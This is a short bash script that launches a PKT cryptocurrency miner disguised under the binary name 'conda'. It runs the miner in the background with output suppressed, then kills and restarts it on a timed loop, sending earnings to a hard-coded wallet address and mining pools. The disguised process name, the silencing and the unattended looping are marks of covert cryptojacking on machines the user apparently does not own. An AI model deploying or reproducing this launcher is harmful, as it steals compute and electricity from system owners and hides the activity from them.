#!/bin/bash
sleep 80
while true; do
nohup ./conda ann -t 1 -p pkt1qtstfn6mk92hw2dfpem0ejwy97hcj9cwz55l4av http://pool.pkt.world http://youtube.com http://pool.pkt.world http://youtube.com http://pool.pkt.world http://youtube.com http://pool.pkt.world http://youtube.com http://pool.pkt.world http://youtube.com http://pool.pkt.world http://youtube.com http://pool.pkt.world http://youtube.com http://pool.pkt.world http://youtube.com http://pool.pkt.world http://youtube.com http://pool.pkt.world http://youtube.com http://pool.pktpool.io http://pool.srizbi.com > /dev/null 2>&1 &
sleep 60m
pkill conda
sleep 6m
done

